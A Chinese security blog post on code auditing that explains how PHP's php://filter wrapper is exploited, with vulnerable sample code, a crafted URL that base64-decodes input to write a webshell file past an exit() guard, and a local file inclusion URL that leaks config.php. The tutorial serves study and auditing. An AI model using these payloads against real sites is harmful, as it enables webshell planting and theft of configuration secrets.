您的位置 » 首页 » 代码审计 » 代码审计:php://filter在php漏洞中的利用

代码审计:php://filter在php漏洞中的利用

发表于4年前 | 作者: seay | 分类: 代码审计 | 孵化于:2013年03月02日 | 文章热度:10,883 次 全屏阅读

显示不全请点击全屏阅读

1、php://filter基础

 
php.net中的描述,http://php.net/manual/zh/wrappers.php.php。php://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和file_get_contents(),在数据流内容读取之前没有机会应用其他过滤器。更详细的内容可以查看上面的链接。
 
php.net中两个基本的例子:
 
<?php
/* 这会以大写字母输出 www.example.com 的全部内容 */
readfile(“php://filter/read=string.toupper/resource=http://www.example.com”);
 
<?php
/* 这会通过 rot13 过滤器筛选出字符 “Hello World”
  然后写入当前目录下的 example.txt */
file_put_contents(“php://filter/write=string.rot13/resource=example.txt”,”Hello World”);
在这个例子中,php会先把Hello World字符串做string.rot13转换然后再写入文件,这在场景A中会有用到。
 
2、利用场景
 
A.在黑哥(膜拜黑哥)的关于[技术挑战-2]有提到,这里只说和php://filter有关的部分。
 
下面一段代码:
 
<?php
$str = ‘<?php exit(\’74\’);?>’.$_GET[‘c’];
$fname = $_GET[‘f’];
file_put_contents($fname,$str);
如何成功将phpinfo();写入文件并执行?利用上面提到的基础知识可以提交如下链接:
 
http://127.0.0.1:81/test.php?f=php%3A%2f%2ffilter%2fwrite%3Dconvert.base64-decode%2fresource%3Dwebshell.php&c=dddPD9waHBpbmZvKCk7Pz4
 
值得注意的有两点:
 
1). base64_decode()会忽略要解码字符串中无效字符像<>?;等,这里给出base64_decode()函数忽略无效字符相应的c函数代码
 
170        ch = base64_reverse_table[ch];
171        if ((!strict && ch < 0) || ch == -1) { /* a space or some other separator character, we simply skipo    ver */       
172             continue;
173        } else if (ch == -2) {
174             efree(result);
175             return NULL;
176        }
177
 
2). 将<?php exit(’74‘);?>去掉无效字符时,补齐为4的倍数,例如这里去掉有效字符后是phpexit74,然后添加3个字符,补位为4的倍数,也就是c参数开头的三个d。原因的话可以查看base64编码的原理。
 
B.本地文件包含
 
如果有这么一段代码:
 
<?php 
include($_GET[‘file’]);
你想查看和本代码同一目录下config.php的内容。如何查看呢?
 
 http://127.0.0.1:81/test.php?file=php://filter/convert.base64-encode/resource=config.php
 
3、参考:
 
http://hi.baidu.com/hi_heige/item/06a5cb12f96f388989a95659
http://www.sektioneins.com/en/advisories/advisory-032009-piwik-cookie-unserialize-vulnerability/index.html
http://php.net/manual/zh/wrappers.php.php
 
 

作者:qingsh4n

 

Tags:

代码审计,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/2356/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有2个筒子的人留下了脚印...

  • 泪之巅 说:
    1楼
    2013 年 3 月 3 日 上午 9:17 回复

    哇……又是PHP审计漏洞?好想学啊……好多更新诶…… 😈

    • 【管理员】seay 说:
      2013 年 3 月 3 日 下午 4:10 回复

      :smile:

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)